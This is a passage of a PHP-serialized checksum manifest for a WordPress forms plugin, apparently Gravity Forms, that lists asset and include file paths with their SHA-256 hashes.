3498b59e015754b934cc40d7e13e29dc5e9817fc54006c3cbca02aff759b\";s:15:\"css/ui.tabs.css\";s:64:\"b73b3cadab5c73f943c2092bdb119b5ee5dee3a93fb9be7bb86dd65fe5b2571d\";s:21:\"fonts/FontAwesome.otf\";s:64:\"444dd4366615ffc4a16d012b2fa90137065d3ccb410fa6fd5e4ddd7b5e4ffcd5\";s:19:\"fonts/dashicons.eot\";s:64:\"a6e78c99762632cefaded74283ecfb782a43c556514864c420c659873d8ae90e\";s:19:\"fonts/dashicons.svg\";s:64:\"11ad006cdf54bc8c0173562adaf5f9ef716615f2817ed275703824d64222e91c\";s:19:\"fonts/dashicons.ttf\";s:64:\"3be75b82760444ff70299eb9ba7bfd697a25e8322e318c84656d56b8a9a52cc8\";s:20:\"fonts/dashicons.woff\";s:64:\"3e98f1fec5f229190191ad152333d9d7288a3b59283200f85c597dacb481e9e7\";s:29:\"fonts/fontawesome-webfont.eot\";s:64:\"7bfcab6db99d5cfbf1705ca0536ddc78585432cc5fa41bbd7ad0f009033b2979\";s:29:\"fonts/fontawesome-webfont.svg\";s:64:\"83139ecfa23cc8d7b0ced7676fbea0c84625f78ba095de36c4e3902814c1e562\";s:29:\"fonts/fontawesome-webfont.ttf\";s:64:\"aa58f33f239a0fb02f5c7a6c45c043d7a9ac9a093335806694ecd6d4edc0d6a8\";s:30:\"fonts/fontawesome-webfont.woff\";s:64:\"ba0c59deb5450f5cb41b3f93609ee2d0d995415877ddfa223e8a8a7533474f07\";s:31:\"fonts/fontawesome-webfont.woff2\";s:64:\"2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe\";s:27:\"fonts/gform-icons-admin.svg\";s:64:\"b50e097405257d87a511668df4b4459cd6b6b08f8402906bd450d1fef3a46380\";s:27:\"fonts/gform-icons-admin.ttf\";s:64:\"2b30a48d3c318cc9841507971fa8f090b7b8ad002e15eff2228e80e5953c6bbd\";s:28:\"fonts/gform-icons-admin.woff\";s:64:\"cb499fec10a4019bc66a39a49d07ac4f7429a7a61e0f9878cc35ab0a7c1555b2\";s:29:\"fonts/gform-icons-admin.woff2\";s:64:\"d80b6401703fe5964ccebf7cf313beeff6f6dc735698b515dcda62644fb7805f\";s:27:\"fonts/gform-icons-theme.svg\";s:64:\"b1e3833e4b93bafe630c1308f23966e488774f31f8b02f0dda71fdbdb05d188d\";s:27:\"fonts/gform-icons-theme.ttf\";s:64:\"fb63e49d0d6a15e7ce801bf66ef1c83c535b01925a4df2938461d7fb7ee1eb81\";s:28:\"fonts/gform-icons-theme.woff\";s:64:\"bf26418edd87cddd051bb77e10616530a7fc6f6dc0a166d6db8fcaff7c3775c9\";s:29:\"fonts/gform-icons-theme.woff2\";s:64:\"b9ce624700932bf9e15e9e7bd4f83f9fddba06b6670d1ac67c365f7d1e43d264\";s:21:\"fonts/gravityfont.eot\";s:64:\"1f5f4bfbf69a35336e918997c4fb23da003ce94363b7fa421494115697f1f6b0\";s:21:\"fonts/gravityfont.svg\";s:64:\"a6334a959ab483116b8af1b194151313d7f85b935468f81b2a8d0b56fdc0eea2\";s:21:\"fonts/gravityfont.ttf\";s:64:\"c704d419be8e7fa90954ffa20b8177113c7b1891944134bfe2c4318e6f9fcd35\";s:22:\"fonts/gravityfont.woff\";s:64:\"b8498de4e4a18a7d7f2778b50a4cbb9fe53a897e33908447f300fab3df5b3570\";s:15:\"fonts/index.php\";s:64:\"6d4a27f1c83723714fe4bcd0c8289ec5870858f4fef53374f52a19c5e38f52a7\";s:31:\"fonts/inter-medium-webfont.woff\";s:64:\"1fa6fc0967b14b758c12c2d4d9f2be21a193e76b8d8f2b2fd36d1bdd08ceefb3\";s:32:\"fonts/inter-medium-webfont.woff2\";s:64:\"6af49a96d2207b5eb06b0d5905cac893011485a88bff319c2d6f6b4dd48263c6\";s:32:\"fonts/inter-regular-webfont.woff\";s:64:\"68c32d88570830bd85a2b29b3496db0332fb656ede7dfb62d6b455cfb96a7055\";s:33:\"fonts/inter-regular-webfont.woff2\";s:64:\"304785d52f777dcec3b82ef4c726072c6f6d447f61b92771ff3b358239750eed\";s:33:\"fonts/inter-semibold-webfont.woff\";s:64:\"bd55adab0075e504929d94d2b5946d8174882502ae80984f565dc94db639d117\";s:34:\"fonts/inter-semibold-webfont.woff2\";s:64:\"9bc2add205157166f5459a0c7f8590ac045506e9e38e7276f433e32202621c0d\";s:18:\"images/active0.png\";s:64:\"4436f7705ac3e439adb4629b3e5a0e24d5785c67811e5b2e1f291c971a8d9f40\";s:18:\"images/active0.svg\";s:64:\"d0fc3fd21c7c7362eb6bd7a1ddc97d34d2d70f83d0fd40be65b741db0aff1c2f\";s:18:\"images/active1.png\";s:64:\"84ad203687d1c1245ba3eeda55a0e869d1039053e4a2106553a83e02389ff1d4\";s:18:\"images/active1.svg\";s:64:\"3afad4151e368811ee7614b527ce8fffe230b9ffd3cc837d430afe6106ac1c19\";s:14:\"images/add.png\";s:64:\"95bbf9307d49f0bca7b40d36caab1837ac81efa1b62a31ac94d22ccfab9dedaf\";s:37:\"images/arrow-right-icon-help-page.svg\";s:64:\"fb1e7076a980c775bc6924f99fcffd60ad1ea74a3b8177a555a57317479e3dc0\";s:22:\"images/arrow-right.png\";s:64:\"059ff8ca0ece0cc3e7359648c79b2bafb93e7d18078dbe413eeb45ff93ca70b7\";s:26:\"images/arrow-rightleft.png\";s:64:\"a5840c0e186064562d5cb726a35a8e2139ca7a8cd3f92f3ce01fa2ce21840c55\";s:21:\"images/blankspace.png\";s:64:\"5eaf12e8fc961ca1cb95ff0db2500214605fbb306fe3e820bd9685d6f3142e99\";s:17:\"images/bullet.svg\";s:64:\"54936298ccfbda8a7000e0640ea3b97fb039953823fcb251b7805749483ead57\";s:19:\"images/calendar.png\";s:64:\"d0ed9d7ee206a9c4546581c248e698988a072353d7ed488b62e962893fa0ddce\";s:23:\"images/captcha_dark.jpg\";s:64:\"8accd0f3780030f6062c8ccaa6b637f3c54db2e6c27cc6c07f1d7076ce567883\";s:33:\"images/captcha_invisible_dark.jpg\";s:64:\"4f55b80cb94283c86f33ec1c156f5f60eee66fbba638470dd90dd66bff69ab94\";s:34:\"images/captcha_invisible_light.jpg\";s:64:\"270edbf6cb1a8c7750b4287065ff87dc7dc981a69791bb6269616e9290578a6f\";s:24:\"images/captcha_large.png\";s:64:\"ab0aa2920f9a06b0e12579e259c0c1d66c76622af814907365731ab171ae645c\";s:24:\"images/captcha_light.jpg\";s:64:\"7c637d5ff9cdaf5a33b376d2dab53ef309fddb86840187d65302242fbc1d5227\";s:25:\"images/captcha_medium.png\";s:64:\"06d360e1c9c3f97081a9b9632e740271e2b54f15d51ba14f3d6eaa7604a3fbfe\";s:24:\"images/captcha_small.png\";s:64:\"6d414403c68df5690e490d37542758bf0a205883b66f39d0eec923dd5c2190d8\";s:16:\"images/check.svg\";s:64:\"a9a32eda2a76777e79cc44f068161d7d9a3a8f7b0435f16b8cf100e0603b1ee8\";s:23:\"images/chevron-down.svg\";s:64:\"b90e0d5ed94bd55c5e7a697f61b139bf5bf806e3ea77ff63c26e739ab35acdf5\";s:20:\"images/cog-hover.svg\";s:64:\"8c9c62292b0030b16a90d96c376532165bb981115f391ee9be65aad3598e1eeb\";s:14:\"images/cog.svg\";s:64:\"2e708242c186109ececa113098db34569d9bf7af44c4d8498a554b5fcafa0713\";s:16:\"images/color.png\";s:64:\"2db596c039d47f710f99504f6db17163819314c02e7027fe47eddd2b91ee77eb\";s:17:\"images/delete.png\";s:64:\"7995bd768504b306fc3e5885bee02a7af948ee307d95add69d9a9828d7675b6b\";s:19:\"images/download.png\";s:64:\"35f6958cdea3eae569f3d7ff3e1b246157cda8440e3a3a4af1c47897b2764ed2\";s:22:\"images/exclamation.png\";s:64:\"91746a798f25488101249abad0960b125a1048f7157e432252138c05ea4adf90\";s:15:\"images/exit.svg\";s:64:\"dfe5d28245ce100162af86a06b10bc677513fc3a85d92dc4b735e28c102450bd\";s:30:\"images/gf-creditcard-icons.png\";s:64:\"c1e739fb74c5c7a1f4a7be812b9a34c9940036346ab0456bfee61c3acbbd2b74\";s:30:\"images/gf-creditcard-icons.svg\";s:64:\"1dd735acac93ed935064f3e83ab105164f886264e33ce1c53411a82604ac96ce\";s:31:\"images/gf-creditcards-check.svg\";s:64:\"4e0232a78b966ee37f966333722c0d96d48cf0445f17de7e4c5f6208e015fd1b\";s:25:\"images/gf-creditcards.svg\";s:64:\"c28490f03f9ca6375ffaadccc8df9c66e5780f3725708c77e1c12792b9179531\";s:31:\"images/gf-custom-field-icon.svg\";s:64:\"f60c1bef0c34a2d3c53df72248c6bf1bf89aeef6db75530224c96a7d931e928f\";s:33:\"images/gf-expand-title-bg-rtl.png\";s:64:\"5f270bf93de8bcccbb64d5ee918d28641476109ca4c77f874afe87fd4d485b35\";s:34:\"images/gf-fieldsettings-header.jpg\";s:64:\"bf28a33566e0b0cf0f3ed35b6940b2944c6477cda01cc3688dee18feefa2f69d\";s:29:\"images/gf-media-button-bg.jpg\";s:64:\"3a74ff6db5405b19278691f4391f11822276e1ee5a108b0c7081d9514f41dd52\";s:27:\"images/gf-new-option-bg.png\";s:64:\"2357909f3c94d59de9eab622497b9293347a4c0ae1ffa09d557c2a6aa047bee6\";s:27:\"images/gf_block_preview.svg\";s:64:\"505374fda3015a6e57be6f12882fefd191c42c522f85e832338213714f6e4f34\";s:25:\"images/gravity-rocket.svg\";s:64:\"13d8afa324d8749ec26b885ba9c6f441080cafae16c9bc2a3b9c6dda14ea7e07\";s:40:\"images/gravityforms-business-upgrade.png\";s:64:\"7a17aadd19133761d58da9d977ae899df8096f979c0932a7341d4d225d0eb812\";s:41:\"images/gravityforms-developer-upgrade.png\";s:64:\"b54c26df2209c484285dc60357936a5e8a685defc0932327498538922f77469a\";s:22:\"images/grey-bullet.svg\";s:64:\"8f427db36abc13947cb7dc856f54688880a5eda4d17fda59fe3548ac9881fa73\";s:21:\"images/grey-check.svg\";s:64:\"ae587b84025274f9049646e5f72a1ab410e38fa40bf31b60021bc708230dfaea\";s:32:\"images/hexagons-bg-dark-blue.svg\";s:64:\"e813251ad80e448f0c8191a058100e90e1d1cd0853657a947ad6130d13e6123f\";s:33:\"images/hexagons-bg-light-blue.svg\";s:64:\"b7ce80e3cdcce500ae7c8c94f23556f51006b6277ec49ab2d8a06debae7f09ae\";s:29:\"images/hexagons-bg-orange.svg\";s:64:\"8b73421667de7425abf9154f5f619a89b26c9f5ec9b18c294ee16f6c577f794c\";s:19:\"images/icon-add.svg\";s:64:\"05a0cc9d0b5d57f60f580ab42c6ec85d93f12d4a349ae4c1f71b53cedbf97037\";s:28:\"images/icon-check-active.svg\";s:64:\"ab9916a6d9842782bf3ac8a5497ffc848f524fc04621f98d777744ead32de38a\";s:30:\"images/icon-check-inactive.svg\";s:64:\"c04df52b30712171e6a03b842d1928aa97530c67a074f302f7b8beefc0b88135\";s:27:\"images/icon-close-small.svg\";s:64:\"530d797b1166b3816bf7feac54bbe487c08b621669a2c0d73175ad894645ae3c\";s:25:\"images/icon-drop-list.png\";s:64:\"77da1485f579863d587b48ee7c13f909d3966ac7fd4f27af63e1f85812995a1f\";s:22:\"images/icon-handle.svg\";s:64:\"624612871a1252077c19a81256f1282260d661deedb44f0e93b5150d3ad5b0de\";s:28:\"images/icon-submenu-down.png\";s:64:\"43b8fa4f14facbfe476d5d35c2d1f288c5e93d423fb00b475a37a9c5586f7aea\";s:16:\"images/index.php\";s:64:\"6d4a27f1c83723714fe4bcd0c8289ec5870858f4fef53374f52a19c5e38f52a7\";s:19:\"images/list-add.svg\";s:64:\"5f0c831784d959be090e17cca209a58b52e388723f44ab2d45134419ba252737\";s:22:\"images/list-remove.svg\";s:64:\"9a87b47ba58897388238e879af6a973820d5d1e16dd0e2b8b9049c5d896bc93f\";s:20:\"images/no-fields.svg\";s:64:\"7ba2725c9b9f8e2f4e9d4a13e266ff790cd886b382c3af0477e455bd1b335eb2\";s:19:\"images/password.svg\";s:64:\"7e15f0ec8cffac794264e39c9566b879c11dd51a01a62a3c22702f92c4b39fa2\";s:23:\"images/plus-icon-hp.svg\";s:64:\"26832cfd877cb01f999fa6b267a2804f41ab5f3702d1e1550b243ff79f9ab842\";s:15:\"images/plus.svg\";s:64:\"d52db5456a77c7701b0a752e01c24219f175ac3dc729fae0490b6f64beacd7b0\";s:23:\"images/preview_grid.gif\";s:64:\"b4a12f3dab4a3ec071de1e242efb80f50a8b967508749a9dbc05431e340e6cff\";s:24:\"images/prodlist-last.png\";s:64:\"aea307d2fc8e02bff71cb5b786e67c1bf79acb6ab8dbee7845d4e876e7f28b7c\";s:19:\"images/prodlist.png\";s:64:\"998e3e1566f79091f9c2e77c6d3eb0f6f4d6960449dce87b02a9240559afa494\";s:24:\"images/prodlist_last.png\";s:64:\"aea307d2fc8e02bff71cb5b786e67c1bf79acb6ab8dbee7845d4e876e7f28b7c\";s:24:\"images/question-mark.svg\";s:64:\"dd89e34cd6c5c822b60036cd4011d0149a19c61e5b2336d7943393a546ef91f0\";s:17:\"images/remove.png\";s:64:\"7104d693b059421a350b1a3fefccc2cf834192ab7e56598cd44c8aa883c7b654\";s:27:\"images/rich-text-editor.png\";s:64:\"73ec4996a08128fcf2d2bf73f97ecb99033d30c8432bcef5bda4e88f4ef6029b\";s:22:\"images/select-date.svg\";s:64:\"fa8ef8050322de92ef551d610d9068aa7d9ecfa6cc84275cfa616a6232402517\";s:17:\"images/select.svg\";s:64:\"dd5c87d0f4682eb9529f575fe3da1be0d02d5d93b3a24b23be612f6163efb075\";s:18:\"images/spinner.svg\";s:64:\"022952f31730804fd25558a0b491a99934f0c01f3da4064800d6591dff1fae6a\";s:16:\"images/star0.svg\";s:64:\"f449adaa0b7e9eca5a90abd8cb85964bc3a3ed8ea4df74805c7cdba9acf75ed8\";s:16:\"images/star1.svg\";s:64:\"545839a3c77d0174ce1ca2e6b27fb09062d01542c75057f06fa469dafb4c98ff\";s:15:\"images/tick.png\";s:64:\"454f5be1584358a7806403c483b2d814b93fdb6c30cdf043a2bb5a9414e140f3\";s:16:\"images/trash.svg\";s:64:\"d7d7d3ba8804e9d40eb4951c16a31ff78c5d6910b55b42aa99675ddeee010ebb\";s:33:\"images/webkit-enhanced-select.png\";s:64:\"5803b6f1030f551d076c05be1858fa0319ee6b272879af2605776ea51a50dec2\";s:14:\"images/xit.gif\";s:64:\"507843094f00e8d3d2939a924f76a22734f411de04530207f728d90221081764\";s:31:\"images/browser-icons/chrome.png\";s:64:\"9b8f39d07bd4e23e50b4d0a70fad274dcb949a033070462321a8d2ad4bfaaa08\";s:29:\"images/browser-icons/edge.png\";s:64:\"939b67cbe1c9db41c3b5328ff5e93b944a961a1b1eb1ec5f311763e34a303bf2\";s:32:\"images/browser-icons/firefox.png\";s:64:\"b5108db4119cdb98798822214f86caae2a2a2ad05afa0c61a4245005e582ebd4\";s:27:\"images/browser-icons/ie.png\";s:64:\"976256f7c1ab0e7576f9476e9a800494ec9621ae0324356469e7b989378fb0b0\";s:30:\"images/browser-icons/opera.png\";s:64:\"7e836a2f0e7083d65130b5c9c3381de3f6cc329e175ec02157ad62988eb32863\";s:31:\"images/browser-icons/safari.png\";s:64:\"70d42f64a708c3fe12a804007a853a25d7987f3465362d63f6defae7a0f07016\";s:32:\"images/datepicker/datepicker.svg\";s:64:\"bd3bf705199748f1c0a443439193419b5b507bf07060cf6f63f68dca2d458301\";s:30:\"images/doctypes/icon_audio.gif\";s:64:\"4fed89c8da22b11022791d898d88c8f1e8e163e4b1e9f885d6c347012d6a4815\";s:28:\"images/doctypes/icon_css.gif\";s:64:\"4ad00081da5c0c66208bcc1ab41c237de7732fd8ba230c11df00bfed451cbf4e\";s:28:\"images/doctypes/icon_doc.gif\";s:64:\"4801ae0d5785e8d5a3cf24d78d67c731944ea63b675dca39ec9da73ba7093873\";s:28:\"images/doctypes/icon_fla.gif\";s:64:\"d1679162c19bde5eeea149bb5d885a07932c355f28ecfa0cef246dcec5bdf3a7\";s:32:\"images/doctypes/icon_generic.gif\";s:64:\"536133d36e041404fec3074bab0433948e65e6ff270f4c20659667b18af43701\";s:29:\"images/doctypes/icon_html.gif\";s:64:\"e7875896b5a9ff43fd65f61c07d1e7c6718d9282607563ef9fcf2d4a23a49c17\";s:30:\"images/doctypes/icon_image.gif\";s:64:\"ca22ab2a32ef178490354c6543639de8d0fa5a2fa4163487014bdccbc6f8b303\";s:27:\"images/doctypes/icon_js.gif\";s:64:\"d2c0486612d961debea1d694645271e3132b10ef56195113370a5d8a9a0dd6ff\";s:28:\"images/doctypes/icon_log.gif\";s:64:\"ef5f06a5a0e7f9f1e48f77c982b051e460c3d3efa64e636738158d91b6553ffd\";s:28:\"images/doctypes/icon_mov.gif\";s:64:\"2979bd925145e5e4bd6811617a8a23245eef2e02424d1496e877cd6bdc6f5617\";s:28:\"images/doctypes/icon_pdf.gif\";s:64:\"315f1c43ad797b0996d9e41c3a9df4c577da9baa2d4605f96f9a34a1ceaaeb6c\";s:28:\"images/doctypes/icon_php.gif\";s:64:\"181175170e6f9b03628502447e64b7c6ab78da9d21cfb0aede19fe3a79373d1d\";s:28:\"images/doctypes/icon_ppt.gif\";s:64:\"ae00b463101d4d1723ef6dfec6e26b3bb8b59eb0ba3d4859e9de6859b69368a0\";s:28:\"images/doctypes/icon_psd.gif\";s:64:\"2dd3b26a3a450848eb8b61dbe9f7e3fd67e80c778f1ad5811459df88979799cf\";s:28:\"images/doctypes/icon_sql.gif\";s:64:\"6001fcfd10948e3d8abdf90ffdb806fc33da099d13ddae5db522844d27d63035\";s:28:\"images/doctypes/icon_swf.gif\";s:64:\"14ee4001cbb3d5678a83d62eab6f32bbcaf8ee18f07fc44055f821c5b0a1ec16\";s:28:\"images/doctypes/icon_txt.gif\";s:64:\"c0739b04707ff403d16404a954c6f13b66d9acd3d866880a7095f6997d4ac8e8\";s:30:\"images/doctypes/icon_video.gif\";s:64:\"6acfac9f3b93ec3742b9cb174087d223d366ffe709c9e79750dd3bb7bed6ecf2\";s:28:\"images/doctypes/icon_xls.gif\";s:64:\"70e33093cd84e950dadbb33d5492e0c6c5ebad0ebd1bf3129bbf823a8b8f11a4\";s:28:\"images/doctypes/icon_xml.gif\";s:64:\"b9e14ab8da48682e9ee42e8e6d5c0ffea1894e16d058648402a3bc20b657fbca\";s:28:\"images/doctypes/icon_zip.gif\";s:64:\"6d7a65eeec664462c5bb95083aa44994adb0b8e8f1044d6401e73a607b404e2b\";s:25:\"images/doctypes/index.php\";s:64:\"6d4a27f1c83723714fe4bcd0c8289ec5870858f4fef53374f52a19c5e38f52a7\";s:35:\"images/footer/rocketgenius-logo.svg\";s:64:\"eda0531ae06ae753797c88c94eeb8d67fe5fc59fe4e0beea684956172f5ca498\";s:35:\"images/logos/gravity-logo-white.svg\";s:64:\"40232735d0f7af3fda5112199558b51839403b6f9ac046a83cef244a91f60395\";s:27:\"images/theme/down-arrow.svg\";s:64:\"bd5c1c581568f6b65cba829068051ba64a226f02e2780e99195813fe05f63292\";s:16:\"includes/api.php\";s:64:\"d7d0edb44fa06f4c417a0f003d41ddf4c6aebd098268e2d0723ca7a9f8566d16\";s:31:\"includes/class-confirmation.php\";s:64:\"68c526e50c37e0fff3e980d0c57712a84b8f376572d13fbe0c5226211ffd460c\";s:41:\"includes/class-gf-background-upgrader.php\";s:64:\"be243532c64906976ced7817c14b1020930c2f9c365bb3899eb7704227f140e3\";s:30:\"includes/class-gf-download.php\";s:64:\"bad294ff9eecab27e4e0febadcc6a520153b7e00ac783cc190002fdab087243f\";s:27:\"includes/class-gf-osdxp.php\";s:64:\"2f96e4ec6e7e4f6c2c28b79a3e8d8668033d8367a85c8c85d7922ef2fc5fa13d\";s:39:\"includes/class-gf-service-container.php\";s:64:\"8ee415e45f8c4d2f9094f472a98afc55146bc567338968aed6702a8245614c9e\";s:38:\"includes/class-gf-service-provider.php\";s:64:\"8e4ebbed97f02f1d920b61633064ab3db5cf502a1225df7a4a41636561c42cb6\";s:29:\"includes/class-gf-upgrade.php\";s:64:\"3283c31f544f5db5d23f5e54fa550a20b05fc8c8ee16f1dd5fe94945f71f3ed0\";s:30:\"includes/class-gravity-api.php\";s:64:\"e2bbbebebc2f4ce80b7612d869ab13564fd44568d5f83a6dccdabe868f8fc1e1\";s:32:\"includes/class-personal-data.php\";s:64:\"2c3505d96aab3d8367df8e31a5af569b0b413c58432b665da5aa4f684d9d4826\";s:44:\"includes/class-translationspress-updater.php\";s:64:\"43f928cb96c71d46bd7cf048332c68e78783a2b1d3ca4c9b5672c87c0e61b741\";s:18:\"includes/index.php\";s:64:\"6d4a27f1c83723714fe4bcd0c8289ec5870858f4fef53374f52a19c5e38f52a7\";s:36:\"includes/trait-redirects-on-save.php\";s:64:\"db79e61fcd8d7ed3c3ccc2e6997f34afe35c7999f1e0f95802218f19d1bcc3ac\";s:19:\"includes/upload.php\";s:64:\"012d0b86b97e4dfd81090bfe66ca2202840a574f1e668cc235f2364e95b89cf8\";s:41:\"includes/addon/class-gf-addon-locking.php\";s:64:\"1dfcd29a7c5f71d825c346bb6410bbd666d4791798c13915ea9bbbc87048fdaa\";s:33:\"includes/addon/class-gf-addon.php\";s:64:\"58b1b620e5bf6e2b6310de02c4c5dcbe75c28358f90040112ed15daa73959366\";s:40:\"includes/addon/class-gf-auto-upgrade.php\";s:64:\"fb209f5e263e85c0351680f59acff55758c42047d90a8d3ce054313f7ab73795\";s:38:\"includes/addon/class-gf-feed-addon.php\";s:64:\"bff1ae575dbca77163317f8eacbde21fdd7be37fa82ce851e69806ec8a5fd963\";s:42:\"includes/addon/class-gf-feed-processor.php\";s:64:\"8915110db33adbfb6361587e4e9301b6c08b4d41edf23b067fcf4e7f4b70b2be\";s:41:\"includes/addon/class-gf-payment-addon.php\";s:64:\"a13f61d9f1638700656c9f3dbd05018586a57274f38d1d6105bef5b9d5ae3e18\";s:35:\"includes/addon/class-gf-results.php\";s:64:\"9c7e18a04aedb2821a918d7ebf9f639ef1b6784014468218ce8408fd2735dbe3\";s:24:\"includes/addon/index.php\";s:64:\"6d4a27f1c83723714fe4bcd0c8289ec5870858f4fef53374f52a19c5e38f52a7\";s:43:\"includes/addon/css/gaddon_form_settings.css\";s:64:\"2511e6fbf101bf8ac613aeb09150e8fe71238b51165669d69d650a009a9510ea\";s:47:\"includes/addon/css/gaddon_form_settings.min.css\";s:64:\"cc4d34f6fd575c2940ecfa856d9bdcdae0259b98a9a0a990c9eca2dda38e486d\";s:37:\"includes/addon/css/gaddon_results.css\";s:64:\"e5d61c972e3555b66edde68b4eeebbef1875bfa1eb9d281efc4ae010f37dcea1\";s:41:\"includes/addon/css/gaddon_results.min.css\";s:64:\"1cbfbbdf8a80961ff982b699dc8be636cc38be5ed4049fe8fb5ab042f7744938\";s:38:\"includes/addon/css/gaddon_settings.css\";s:64:\"7b4b6bc83e2ce0c958be5ebf44f033c334f34159e5ee9f5d556e57cc7ea486e8\";s:42:\"includes/addon/css/gaddon_settings.min.css\";s:64:\"80a65fcb3676e298c9fa3ef5be6f37232c44e2854846a1fd86a912e3461a607c\";s:28:\"includes/addon/css/index.php\";s:64:\"6d4a27f1c83723714fe4bcd0c8289ec5870858f4fef53374f52a19c5e38f52a7\";s:43:\"includes/addon/images/field-map-buttons.png\";s:64:\"26f6aec063b0714abaa2b2bb84f75966a9e6c2905309b6d4b62227370b95f4fa\";s:41:\"includes/addon/images/field-map-reset.png\";s:64:\"946c83a32753e89c637b3f95595ea0893fe13561958b0ed208929549d81f5735\";s:37:\"includes/addon/js/gaddon_feedorder.js\";s:64:\"7b554eb78b726490b244b7ee4b458a0062d9ebfe6bab3de0d09185221d1affeb\";s:41:\"includes/addon/js/gaddon_feedorder.min.js\";s:64:\"2e84d7fe83910c910926b3bec4e20a0888027cdf63e4ebaf9189faf19143e4b1\";s:36:\"includes/addon/js/gaddon_fieldmap.js\";s:64:\"3ff6b109e9ec90de96e702ca7a3ba5a7bc0371c33f7946f39d66306e9f28d38c\";s:40:\"includes/addon/js/gaddon_fieldmap.min.js\";s:64:\"dfc96c3dfebb9c23bc6fb6ff860e2204296c45eedd82fa3c2ef6af8627ba698f\";s:36:\"includes/addon/js/gaddon_frontend.js\";s:64:\"ae3b36317890c96e9273fdffe154d17c57c187b8c8b0a9f78192edcc33b45f93\";s:40:\"includes/addon/js/gaddon_frontend.min.js\";s:64:\"f8776fe788aa1690c4cfff0b4723fc47a61448954ad4ba1c69111d50d30dafb3\";s:38:\"includes/addon/js/gaddon_genericmap.js\";s:64:\"3710b670e2e1aa7cb5c59fbf6ca4c79bb88306d7902e38ff2b36d9b7f4bfdfd1\";s:42:\"includes/addon/js/gaddon_genericmap.min.js\";s:64:\"e4b78a45d4662be1e8e82443de036cafeb2536513b8a655d0276f2d37d9cb80e\";s:35:\"includes/addon/js/gaddon_payment.js\";s:64:\"fa6ae807feb75f373503f2aad4abcc72932310c7610cfebb56902ce4e821dd17\";s:39:\"includes/addon/js/gaddon_payment.min.js\";s:64:\"cf1ba8ed8197e7c3a28a1c8834eac7460eb706c78ef97aecfd7fbe45c7d5887c\";s:35:\"includes/addon/js/gaddon_results.js\";s:64:\"7cb7bd2fe1b478dade874d6ed1caaa8eeaf6648fee0872602f27d826367d0478\";s:39:\"includes/addon/js/gaddon_results.min.js\";s:64:\"27c67482cce7ea7bd81143ada8c73d1af25749f7dc86fff5d776db7a1d956ee9\";s:33:\"includes/addon/js/gaddon_token.js\";s:64:\"f18f65ea1c29f611369e0feb749264c4882c060c72fc110ec7ca2c266d1a0b2a\";s:37:\"includes/addon/js/gaddon_token.min.js\";s:64:\"d14757315390ac20aa81f48caf81f6372283fe38df3290e6c11737fe25b9938c\";s:27:\"includes/addon/js/index.php\";s:64:\"6d4a27f1c83723714fe4bcd0c8289ec5870858f4fef53374f52a19c5e38f52a7\";s:29:\"includes/addon/js/repeater.js\";s:64:\"651610a5b830331c09ea1d6b8c3ce3b6fe6c9b3b101a00121e77310532207a9c\";s:33:\"includes/addon/js/repeater.min.js\";s:64:\"711ecfa1d4a9f646a4a7b18d783f37a7da2c207def50703fabb9a812e9e2610b\";s:44:\"includes/assets/class-gf-asset-processor.php\";s:64:\"d0ad44f35160c52497986973111f9f3b15effc07ffa48a157c09c0b4eb5b4a35\";s:51:\"includes/assets/class-gf-asset-service-provider.php\";s:64:\"b3b43129853e3788e71a42b7691a60146967f679152f4f73fd55530e8ae2b832\";s:34:\"includes/assets/class-gf-asset.php\";s:64:\"9f6e41701848182b06a396712bc42f6ba10fc5bbacccd47dd22f3ba44dfbf469\";s:41:\"includes/assets/class-gf-script-asset.php\";s:64:\"7ddbc01645884c9f28b7bbc5369e074c3cd184f0e33b0722bd41c9d9a35daf2a\";s:40:\"includes/assets/class-gf-style-asset.php\";s:64:\"9ec8a21d8baa81daaacdeb2e4a6b2f98cd015e943dcb6af92ec728fd2da84963\";s:25:\"includes/assets/index.php\";s:64:\"6d4a27f1c83723714fe4bcd0c8289ec5870858f4fef53374f52a19c5e38f52a7\";s:66:\"includes/assets/admin-dependencies/class-gf-admin-dependencies.php\";s:64:\"89157a83b8462b61711321e59b0d83b2b67004d3c5d1f6d9b6a42171ed7dc7b0\";s:73:\"includes/assets/admin-dependencies/class-gf-admin-script-dependencies.php\";s:64:\"9e33d400ff9497c4b60822c6fe0bcd9e5de71cae5de45c835365ca3c83be33f9\";s:72:\"includes/assets/admin-dependencies/class-gf-admin-style-dependencies.php\";s:64:\"a4ee66ddcb9f6deb7ec8f04a1378190d45380791cbbbf93dea9609a7fbcb746d\";s:39:\"includes/blocks/class-gf-block-form.php\";s:64:\"e8fb027255514db3b526c6e6788657897d69b4daf250a6fc9d37dd33a2e75f4b\";s:34:\"includes/blocks/class-gf-block.php\";s:64:\"a4bd8d88458b7942cec88712dbdf7b0e9485b8501d08d195236ebaf2bc0b59a7\";s:35:\"includes/blocks/class-gf-blocks.php\";s:64:\"c86d70ed4a00b16a373c780c50d08571b1b6fdd7290422e5b62be5ad2064dcd0\";s:46:\"includes/config/class-gf-config-collection.php\";s:64:\"e16f7bbb135e6694f005278a1940f010ca48c6b2012a966a9a29b4cfe39cfb89\";s:47:\"includes/config/class-gf-config-data-parser.php\";s:64:\"af36e1686109ee941afd6f029b82d4ca6651f9d64bea30a3a5a9ec256a403113\";s:52:\"includes/config/class-gf-config-service-provider.php\";s:64:\"14a5d1df3b6cf9bc24376b78ae3a6f814eb14464ff57780399e56e1849d63137\";s:35:\"includes/config/class-gf-config.php\";s:64:\"7f49bf50dee05db7857d2fa74ac2d669e9e1ef09ad508e27f5cd34564782695a\";s:52:\"includes/config/items/class-gf-config-admin-i18n.php\";s:64:\"c65d3b5138a59c0d6e52e914731e2705c1db50e7f1748b9c1a861204a595af20\";s:54:\"includes/config/items/class-gf-config-block-editor.php\";s:64:\"d746f48be9d62c37033ad97ac2390dbae4af0a79e96116fb83d04992b2aee4cb\";s:46:\"includes/config/items/class-gf-config-i18n.php\";s:64:\"6b0683c323dcd10a1eb22e6b89bb3d718416743558a983b97c4e7442b563184f\";s:60:\"includes/config/items/class-gf-config-legacy-check-multi.php\";s:64:\"f9b1ada5635296ccf2e8991361c8e685993c29e4bb757aa345c598684884d088\";s:54:\"includes/config/items/class-gf-config-legacy-check.php\";s:64:\"ce7a1d68aeb2755564040d8cf16d5e61ee6bdb79dab41e4176ae0fc263fbd830\";s:51:\"includes/config/items/class-gf-config-multifile.php\";s:64:\"79161e396bca4aa27b78f9c5b53d04fd8bb94cb3e445acee5646d4c495063351\";s:73:\"includes/duplicate-submissions/class-gf-duplicate-submissions-handler.php\";s:64:\"a41a96918df3ebfc4f162276c8bd6f2ccf419d51631856b926eca5